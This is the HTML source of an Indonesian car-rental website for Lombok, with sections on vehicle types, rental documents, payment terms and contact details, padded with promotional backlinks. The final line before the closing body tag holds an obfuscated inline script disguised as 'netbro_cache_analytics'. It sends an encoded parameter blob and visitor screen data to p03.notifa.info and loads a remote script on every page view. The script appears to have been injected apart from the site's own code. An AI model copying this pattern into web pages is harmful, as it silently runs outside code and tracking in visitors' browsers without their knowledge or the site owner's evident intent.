
<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>Sewa Mobil Lombok - Sewa Mobil Murah dan Paket Lengkap</title>

    <link rel="shortcut icon" href="images/icon.jpg">

    <!-- css include -->
    <link rel="stylesheet" type="text/css" href="assets/css/materialize.css">
    <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="assets/css/owl.carousel.min.css">
    <link rel="stylesheet" type="text/css" href="assets/css/owl.theme.default.min.css">
    <link rel="stylesheet" type="text/css" href="assets/css/animate.css">

    <!-- my css include -->
    <link rel="stylesheet" type="text/css" href="assets/css/reset.css">
    <link rel="stylesheet" type="text/css" href="assets/css/style.css">
    <link rel="stylesheet" type="text/css" href="assets/css/responsive.css">

</head>

<body class="clearfix">

    <div data-scroll='0' class="thetop"></div>
    <!-- for back to top -->

    <!-- ========== ========== fixed - left side body start ========== ========== -->
    <div class="fixed-left-side-body">
        <div class="profile">
            <div class="profile-image center-align">
                <img src="assets/images/icon.jpg" alt="Image">
            </div>
            <!-- /.profile-image -->

            <div class="profile-name center-align">
                <h1 class="user-name">Mobil Lombok</h1>
                <p>
                    Sewa Mobil Lombok Murah dan Paket Lengkap
                </p>
            </div>
            <!-- /.profile-name -->

            <ul class="social-btn">
                <li>
                    <a href="https://twitter.com/mobillombok99">
                        <i class="fa fa-twitter" aria-hidden="true"></i>
                    </a>
                </li>
                <li>
                    <a href="https://www.instagram.com/mobillombokcom/">
                        <i class="fa fa-instagram" aria-hidden="true"></i>
                    </a>
                </li>
                <li>
                    <a href="https://www.linkedin.com/in/rental-mobil-lombok/">
                        <i class="fa fa-linkedin" aria-hidden="true"></i>
                    </a>
                </li>
                <li>
                    <a href="https://id.pinterest.com/sewamobillombok99/">
                        <i class="fa fa-pinterest" aria-hidden="true"></i>
                    </a>
                </li>
            </ul>
        </div>
        <!-- /.profile -->
    </div>
    <!-- /.fixed-left-side-body -->
    <!-- ========== ========== fixed - left side body end ========== ========== -->

    <!-- ========== ========== right side body start ========== ========== -->
    <div class="right-side-body">

        <!-- ==================== header-section start ==================== -->
        <header id="header-section" class="header-section mb-30 clearfix">
            <div class="">
                <nav class="main-nav">
                    <div class="nav-wrapper main-nav-wrapper">

                        <ul class="alternative-menu ul-li responsive_menu_fixed">

                            <li class="alt-search-area">
                                <form action="#">
                                    <input class="alternative-search" type="search" placeholder="search">
                                    <button><i class="fa fa-search"></i></button>
                                </form>
                            </li>

                            <li class="side-menu-btn right">
                                <a href="#" class="button-collapse waves-effect default" data-activates="mobile-demo">
                                    <i class="fa fa-bars" aria-hidden="true"></i>
                                </a>
                            </li>
                        </ul>
                        <!-- /.alternative-menu -->
                        <div class=" hello_icon_menu hello_single_index_menu1">
                            <ul class="ul-li-block side-nav" id="mobile-demo">

                                <li class="sn-user">
                                    <span class="sn-user-img">
        								<img src="assets/images/icon.jpg" alt="Image">
        							</span>
                                    <span class="sn-user-name">
        								Mobil Lombok
        							</span>
                                </li>
                                <!-- /.sn-user -->                                
                                <li class="active"><a href="0" class="nav-mobile">home</a></li>
                                <li><a href="1" class="waves-effect default">about</a></li>
                                <li><a href="2" class="waves-effect default">jenis kendaraan</a></li>
                                <li><a href="3" class="waves-effect default">dokumen</a></li>
                                <li><a href="4" class="waves-effect default">pembayaran</a></li>
                                <li><a href="7" class="waves-effect default">blog</a></li>
                                <li><a href="8" class="waves-effect default">contact</a></li>
                            </ul>
                        </div>
                        <div class="hello_main_navigation hello_single_index_menu2">
                            <ul id="nav-mobile" class="right main-nav-ul">
                                <li class="active"><a href="0" class="nav-mobile">home</a></li>
                                <li><a href="1" class="waves-effect default">about</a></li>
                                <li><a href="2" class="waves-effect default">jenis kendaraan</a></li>
                                <li><a href="3" class="waves-effect default">dokumen</a></li>
                                <li><a href="4" class="waves-effect default">pembayaran</a></li>
                                <li><a href="7" class="waves-effect default">blog</a></li>
                                <li><a href="8" class="waves-effect default">contact</a></li>
                                <li>
                                    <a href="0" class="waves-effect default cd-search-trigger">
                                        <i class="fa fa-search" aria-hidden="true"></i>
                                    </a>
                                </li>
                            </ul>
                        </div>

                        <!-- /.main-nav-ul -->
                        <div class="hello_menu_fixed_main_wrapper">
                            <div class="row">
                                <div class="col-lg-3 col-md-3 col-sm-3 col-xs-12">
                                    <div class="hello_logo_wrapper">
                                        <div class="hello_logo">
                                            <a href="https://mobillombok.com/" target="_blank"><img src="assets/images/logo.png" alt="hello_logo"></a>
                                        </div>
                                    </div>
                                </div>
                                <div class="col-lg-9 col-md-9 col-sm-9 col-xs-12">
                                    <div class="hello_fixed_nav_wrapper hello_single_index_menu3">
                                        <ul class="hello_nav_fixed">
                                            <li><a href="0" class="nav-mobile">home</a></li>
                                            <li><a href="1" class="waves-effect default">about</a></li>
                                            <li><a href="2" class="waves-effect default">jenis kendaraan</a></li>
                                            <li><a href="3" class="waves-effect default">dokumen</a></li>
                                            <li><a href="4" class="waves-effect default">pembayaran</a></li>
                                            <li><a href="7" class="waves-effect default">blog</a></li>
                                            <li><a href="8" class="waves-effect default">contact</a></li>
                                            <li>
                                                <a href="0" class="waves-effect default cd-search-trigger">
                                                    <i class="fa fa-search" aria-hidden="true"></i>
                                                </a>
                                            </li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- /.main-nav-wrapper -->
                </nav>
            </div>
            <!-- /.
			-->

            <div id="cd-search" class="cd-search">
                <form action="#">
                    <input type="search" placeholder="Search...">
                </form>
            </div>

        </header>
        <!-- /#header-section -->
        <!-- ==================== header-section end ==================== -->

        <!-- ==================== aboutme-section start ==================== -->
        <div data-scroll='1' class="aboutme-section sec-p100-bg-bs mb-30 clearfix" id="about">
            <div class="Section-title">
                <h2>
					<i class="fa fa-user-o" aria-hidden="true"></i>
					about me
				</h2>
                <span>about me</span>
                <p>
                    Kami berkomitmen untuk menyajikan layanan <a href="https://mobillombok.com/" target="_blank">Sewa Mobil Lombok</a> terbaik dengan menyiapkan kendaraan yang bisa diandalkan baik dari aspek performa maupun estetika. Didukung oleh staf pelayanan pelanggan yang siap menjawab pertanyaan dan memberikan solusi terbaik untuk anda. Supir yang akan mengantar anda adalah sopir yang sudah terpilih melalui seleksi yang ketat, keterampilan mengemudi handal, ramah, mengusai rute perjalanan dan memiliki wawasan pariwisata.
                </p>
                <p>
                    Tidak masalah jika Anda memiliki daftar tempat menarik untuk dikunjungi atau hanya ingin berlibur untuk petualangan, sewa mobil di Lombok adalah solusi ideal. Kami berlokasi di bandara dan lokasi pusat kota yang nyaman. Rangkaian kategori mobil kami yang beragam dapat memenuhi berbagai kebutuhan mobilitas dan armada kami menyediakan banyak pilihan kendaraan terbaru dari beberapa produsen mobil terbaik di dunia. Anda juga dapat menyesuaikan <a href="https://mobillombok.com/" target="_blank">rental mobil lombok</a> Anda.
                </p>
            </div>
            <!-- /.Section-title -->
        </div>
        <!-- /.aboutme-section -->
        <!-- ==================== aboutme-section end ==================== -->

        <!-- ==================== jenis-section start ==================== -->
        <div data-scroll='2' class="aboutme-section sec-p100-bg-bs mb-30 clearfix" id="about">
            <div class="Section-title">
                <h2>
                    <i class="fa fa-car" aria-hidden="true"></i>
                    Jenis Kendaraan
                </h2>
                <span>Jenis Kendaraan</span>
                <p>
                    <a href="https://mobillombok.com/" target="_blank">Sewa Mobil Lombok</a> adalah pilihan ekonomis dan praktis untuk perjalanan kota. Ukurannya yang lebih kecil artinya lebih mudah menavigasi di sekitar kota dan menemukan tempat parkir di kota-kota Lombok yang bersejarah.
                </p>
                <p>
                    Sewa Sedan Lombok adalah pilihan tepat untuk perjalanan antar kota dan perjalanan yang lebih panjang. Selamat menikmati dan ekstra membantu Anda tetap rileks dan menikmati perjalanan. Saat berlibur lebih lama, lebih mudah memanfaatkan waktu Anda dengan pantai-pantai.
                </p>
                <p>
                    Sewa Mobil sport dan convertible adalah cara yang menyenangkan untuk menambah kegembiraan dalam perjalanan. Konvertibel adalah pendamping sempurna untuk menjelajahi jalan raya Pesisir, sementara mobil eksotis adalah cara yang penuh gaya untuk menjelajahi kota-kota kelas dunia.
                </p>
                <p>
                    Sewa SUV adalah tendangan samping yang Anda inginkan untuk petualangan di taman nasional atau berlibur di pantai. Dengan ruang yang luas untuk penumpang dan peralatan, mereka membutuhkan perjalanan pendek dan panjang tetap sederhana dengan keserbagunaannya. Sewa truk penjemputan di Lombok untuk menjelajahi dengan nyaman.
                </p>
                <p>
                    Sewa Minivan Lombok memungkinkan Anda membawa bagasi tambahan tanpa memberi Anda fasilitas perjalanan yang andal dan aman. Beberapa penumpang tersedia di Perusahaan kami.
                </p>
                <p>
                    <a href="https://mobillombok.com/rental-mobil/sewa-bus-lombok.html" target="_blank">Sewa Bus Lombok</a> juga bisa anda tetapkan sebagai salah satu pilihan sewa. Dengan menggunakan Bus, anda bisa mengajak seluruh anggota keluarga anda, atau untuk sekolah-sekolah yang akan melakukan study tour juga bisa. 
                </p>
                <p>
                    Terkait : <a href="https://gotripina.com/blog/pantai-tanjung-aan-lombok" target="_blank">Eksotisnya Panoraman Indahnya Pantai Tanjung Aan Lombok</a>
                </p>
            </div>
            <!-- /.Section-title -->
        </div>
        <!-- /.aboutme-section -->
        <!-- ==================== jenis-section end ==================== -->

        <!-- ==================== dokumen-section start ==================== -->
        <div data-scroll='3' class="aboutme-section sec-p100-bg-bs mb-30 clearfix" id="about">
            <div class="Section-title">
                <h2>
                    <i class="fa fa-file-o" aria-hidden="true"></i>
                    Dokumen
                </h2>
                <span>Dokumen</span>
                <p>
                    Penyewa dan semua pengemudi harus memilih SIM asli yang sah saat mengambil. Tidak ada jumlah minimum yang diperlukan SIM untuk memiliki SIM. Penyewa yang memiliki surat izin mengemudi dari luar Lombok perlu menunjukkan paspor yang masih berlaku atau kartu identitas yang dikeluarkan pemerintah selain dari SIM mereka. Harus dilengkapi dengan surat izin mengemudi. Untuk SIM dari negara-negara bukan bagian dari perjanjian SIM internasional, terjemahan resmi SIM harus disetujui dengan SIM asli.
                </p>
            </div>
            <!-- /.Section-title -->
        </div>
        <!-- /.aboutme-section -->
        <!-- ==================== dokumen-section end ==================== -->

        <!-- ==================== pembayaran-section start ==================== -->
        <div data-scroll='4' class="aboutme-section sec-p100-bg-bs mb-30 clearfix" id="about">
            <div class="Section-title">
                <h2>
                    <i class="fa fa-money" aria-hidden="true"></i>
                    Pembayaran
                </h2>
                <span>Pembayaran</span>
                <p>
                    Kami menerima semua kartu kredit. Nama pada kartu harus sama dengan nama penyewa dan harus disetujui pada saat mengumpulkan kendaraan sewaan. Kartu debit diterima kompartemen kendaraan non-mewah dan meminta persetujuan tambahan. Kami tidak menerima kartu prabayar, Kartu Elektron Visa, kartu elektronik saja, Kartu Maestro, cek atau uang tunai. Informasi lebih lanjut dapat ditemukan di halaman Metode Pembayaran kami.
                </p>
            </div>
            <!-- /.Section-title -->
        </div>
        <!-- /.aboutme-section -->
        <!-- ==================== pembayaran-section end ==================== -->

        <!-- ==================== latest-news-section start ==================== -->
        <div data-scroll='7' class="latest-news-section sec-p100-bg-bs mb-30 clearfix" id="blog">

            <div class="Section-title">
                <h2>
					<i class="fa fa-newspaper-o" aria-hidden="true"></i>
					Overview
				</h2>
                <span>Overview</span>
            </div>
            <!-- /.Section-title -->

            <div class="news-item clearfix">
                <div class="news-image b4-1 left">
                    <img src="assets/images/blog/avanza.png" alt="Image">
                </div>
                <!-- /.news-image -->
                <div class="news-contant right left-align">
                    <h2 class="title">Toyota Avanza</h2>
                    <p>
                        <a href="https://mobillombok.com/rental-mobil/sewa-avanza-lombok-murah.html" target="_blank">Sewa Avanza Lombok</a> manual / matik 2019 dengan / tanpa Sopir / lepas kunci untuk pemakaian dalam dan luar kota Lombok. Mobil Avanza Lombok memang saat ini banyak dipilih masyarakat karena memudahkan mereka untuk melakukan perjalanan. Jasa sewa mobil ini hadir dalam bentuk penyewaan mobil. Mobil-mobil yang disewakan pun bukan mobil abal-abal, melainkan mobil dengan kualitas terbaik. Nah, salah satu mobil yang bisa anda sewa di rental adalah Toyota Avanza.
                    </p>
                </div>
                <!-- /.news-contant -->
            </div>
            <!-- /.news-item -->

            <div class="news-item clearfix">
                <div class="news-image b4-1 left">
                    <img src="assets/images/blog/hiace.png" alt="Image">
                </div>
                <!-- /.news-image -->
                <div class="news-contant right left-align">
                    <h2 class="title">Toyota Hiace</h2>
                    <p>
                        <a href="https://mobillombok.com/rental-mobil/sewa-hiace-di-lombok-murah.html" target="_blank">Sewa Hiace Lombok</a> terkenal sebagai microbus yang kuat namun juga nyaman untuk penumpang. Toyota Hiace telah mengalami perkembangan generasi antara lain: generasi pertama (1967-1977), generasi kedua (1977-1985), generasi ketiga (1984-1989), generasi keempat (1989-2004), dan Toyota New Hiace sebagai generasi kelima (2005 - sekarang).
                    </p>
                </div>
                <!-- /.news-contant -->
            </div>
            <!-- /.news-item -->

            <div class="news-item clearfix">
                <div class="news-image b4-1 left">
                    <img src="assets/images/blog/innova.png" alt="Image">
                </div>
                <!-- /.news-image -->
                <div class="news-contant right left-align">
                    <h2 class="title">Toyota Kijang Innova</h2>
                    <p>
                        <a href="https://mobillombok.com/rental-mobil/rental-innova-lombok-murah.html" target="_blank">Sewa Innova Lombok</a> murah tersedia type G V warna hitam, putih, silver family dan captain seat solar, bensin manual / matik. Mobil Innova Lombok memang dicari oleh para konsumen yang membutuhkan sewa innova Lombok untuk jalan-jalan atau kegiatan lainnya saat sedang berada di Lombok.
                    </p>
                </div>
                <!-- /.news-contant -->
            </div>
            <!-- /.news-item -->

        </div>
        <!-- /.latest-news-section -->
        <!-- ==================== latest-news-section end ==================== -->

        <!-- ==================== contact-me-section start ==================== -->
        <div data-scroll='8' class="contact-me-section sec-p100-bg-bs mb-30 clearfix" id="contact">

            <div class="Section-title">
                <h2>
					<i class="fa fa-envelope-o" aria-hidden="true"></i>
					contact me
				</h2>
                <span>contact me</span>
            </div>
            <!-- /.Section-title -->

            <div class="row">
                <div class="col l6 m12 s12">
                    <div class="contact-left">

                        <div class="cont-item phone">
                            <h2 class="title mb-30">phone</h2>
                            <div class="cont-numbers">
                                <p>
                                    <span>Mob.</span>082 339 443 335
                                </p>
                            </div>
                            <!-- /.cont-numbers -->
                        </div>
                        <!-- /.cont-item -->

                        <div class="cont-item email">
                            <h2 class="title mb-30">email</h2>
                            <div class="cont-numbers">
                                <p>info@mobillombok.com</p>
                            </div>
                            <!-- /.cont-numbers -->
                        </div>
                        <!-- /.cont-item -->

                        <div class="cont-item address">
                            <h2 class="title mb-30">address</h2>
                            <div class="cont-numbers">
                                <p><a href="https://goo.gl/maps/LezJ8RyBsyr" target="_blank">Jl Gili Trawangan No 22, Taman Karang Baru, Kec Selaparang, Mataram Lombok – Nusa Tenggara Barat</a></p>
                            </div>
                            <!-- /.cont-numbers -->
                        </div>
                        <!-- /.cont-item -->

                    </div>
                    <!-- /.contact-left -->
                </div>
                <!-- colm6 -->

                <div class="col l6  s12">
                    <div class="contact-right clearfix">

                        <form action="#">

                            <h2 class="title mb-30">here me</h2>

                            <div class="input-field">
                                <input type="text" name="full_name" class="require">
                                <label>First Name</label>
                            </div>

                            <div class="input-field">
                                <input type="text" name="email" class="require" data-valid="email" data-error="Email should be valid.">
                                <label>Email</label>
                            </div>

                            <div class="input-field">
                                <input type="text" name="subject" class="require">
                                <label>Subject</label>
                            </div>

                            <div class="input-field">

                                <textarea rows="7" name="message" class="materialize-textarea"></textarea>
                                <label>Message</label>
                                <div class="response"></div>
                            </div>

                            <button type="button" class="submitForm custom-btn waves-effect"><i class="fa fa-envelope-o" aria-hidden="true"></i>Send</button>
                        </form>

                    </div>
                    <!-- /.contact-right -->
                </div>
                <!-- colm6 -->
            </div>
            <!-- row -->

        </div>
        <!-- /.contact-me-section -->
        <!-- ==================== contact-me-section end ==================== -->

        <!-- ==================== footer-section start ==================== -->
        <footer id="footer-section" class="footer-section clearfix">
           <!--  <p>© 20018 Copyright <a href="#" class="photoshop-color">My Porto</a> Design by <a href="http://webstrot.com/" class="photoshop-color">webstrot.</a></p> -->

            <div class='backtotop'>
                <a href="#" class='scroll'>
                    <i class="fa fa-long-arrow-up" aria-hidden="true"></i>
                </a>
            </div>
            <!-- backtotop -->
        </footer>
        <!-- /.footer-section -->
        <!-- ==================== footer-section end ==================== -->
    </div>
    <!-- ========== ========== right side body end ========== ========== -->

    <!-- jquery and bootstrap.js -->
    <script src="assets/js/jquery-3.1.1.min.js"></script>
    <script src="assets/js/materialize.min.js"></script>
    <script src="assets/js/owl.carousel.min.js"></script>
    <script src="assets/js/isotope.pkgd.min.js"></script>
    <script src="assets/js/circle-progress.js"></script>

    <!-- my custom js -->
    <script src="assets/js/custom.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2lxWPmWwCtvkFLKpJq1Cv4s77uldQHpWAYJOg%2fMWEhkILq9CIGdTK6grPM80IFWWFMXM915eztPilamyxS5SbxEp81S9%2f4YV6uPq3%2fxCBYlO4FTbDbPslcw95OBxB1YTIdohAU79blvrsKinZEGGH9mHrt0pyL8uBJZv5%2byhpkoczMEjY3F6MLBFdHCg4y%2bhRwRZ0I6whiGEeQGQN0Xzn3nHv4c3pzZH1AnhyMlarUjpN0u9Q3GHclTcsWLjRRaoR7wK%2bmv4oADztIQzNhliwvC1DKa958oZ49o65KOmf%2boyvWfu9gRw87s23CNfUBRnOXYtadQNy9s2KTZe2MYMOTd4h%2fZDKr6ha6fjyZ%2fJntDywWVeiu%2bwrCzjw0YgnXgXnQ%2bvD48JpY8k%2fNUFm5tNOYanjvGuQ9tuZCdQRfXRLw7lIwSo1%2brvQg7F4HKg9EELat8WwEov0AwVCI1zi%2f0TBURVg0prP2bLfzP%2biu8h%2byDPPT6MzX%2bEMzRx3sKbdQF%2b7ojUdM%2bt1KIWGw25vvE7Ij3GJ%2fd7cY5PfKXmG%2b6g2FLrJhIxkb3%2fcAwnbIp%2fQb37zHo3n1g8%2b0%2b8%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>